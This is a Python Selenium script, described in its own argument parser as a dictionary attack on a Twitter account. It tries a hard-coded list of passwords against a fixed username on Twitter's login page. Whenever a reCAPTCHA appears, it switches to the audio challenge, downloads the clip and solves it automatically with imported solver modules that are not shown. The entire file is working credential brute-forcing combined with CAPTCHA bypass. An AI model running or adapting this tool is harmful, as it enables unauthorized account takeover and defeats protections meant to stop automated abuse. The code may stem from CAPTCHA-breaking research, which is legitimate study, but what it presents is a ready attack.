#!/usr/bin/python
import selenium
from selenium import webdriver
import time, os, argparse, logging
import solver, spectrogram_splitter, simple_mash, contextual_mash
from parse_solver_args import parse_solver_options,print_solver_help_and_exit

username = "alksdjfalkdsjf"
passwords = [ "1h", "nineteen", "rrf)#*hh", "12345" ] 

parser = argparse.ArgumentParser(description="Dictionary attack twitter account")
parser.add_argument('-s', nargs='*', action='append', help='Adds a solver to the list of solvers to be used to solve the captcha. ' 
                    + 'This option can be specified multiple times to use additional solvers as backup.  Use -sh for information on specifying solvers')
parser.add_argument('-sh', required=False, action='store_true', help='Show the syntax to specify solvers')
parser.add_argument('-v', required=False, action='store_true', help='Verbose mode.')
parser.add_argument('-vv', required=False, action='store_true', help='Very Verbose mode.')
args = parser.parse_args()

args = parser.parse_args()
if args.sh:
    print_solver_help_and_exit()
output_level = logging.CRITICAL
if args.vv:
    output_level = logging.DEBUG
elif args.v:
    output_level = logging.INFO

masher = contextual_mash.ContextualMash(output_level)
splitter = spectrogram_splitter.SpectrogramSplitter(debug = output_level)
solver_list, solver_thresholds = parse_solver_options(args.s, output_level)
captcha_solver = solver.CaptchaSolver(solver_list, splitter, solver_thresholds, masher, output_level)

filename = "captcha" + str(os.getpid())

fp = webdriver.FirefoxProfile()
driver = webdriver.Firefox(firefox_profile=fp)
for j in range(0, len(passwords)):
    password = passwords[j].replace("\n", "")
    driver.get("https://twitter.com/#!/login/captcha")
    exception = True
    passwordFound = False
    while exception:
        if driver.current_url.find("login") == -1 and j != 0:
            print "Found the password: ", passwords[j-1]
            passwordFound = True
            break
    
        try:
            driver.execute_script("document.getElementsByName('session[username_or_email]')[2].value = '" + username + "';")
            driver.execute_script("document.getElementsByName('session[password]')[2].value = '" + password + "';")
            exception = False
        except selenium.common.exceptions.WebDriverException:
            exception = True

    if passwordFound:
        break
    print "Trying password '" + password + "'"

    captcha_textbox = None
    try:
        captcha_textbox = driver.find_element_by_id("recaptcha_response_field")
    except:
        print "No captcha"

    if captcha_textbox != None:
        href = None
        while href == None:  #Wait for the href if selenium returns before the link has appeared
            try:
                switch_audio_button = driver.find_element_by_id('recaptcha_switch_audio')
                switch_audio_button.click() 
                href = driver.find_element_by_id("recaptcha_audio_download")
            except:
                print "Couldn't find audio download link"
                time.sleep(.3)

        url = str(href.get_attribute("href"))
        if not captcha_solver.get_mp3(url, filename):
            print "Could not download mp3 file",filename + ".mp3"
            continue
        answer = captcha_solver.solve(filename)
        captcha_textbox.send_keys(answer)

    forms = driver.find_elements_by_tag_name("form")
    forms[5].submit()

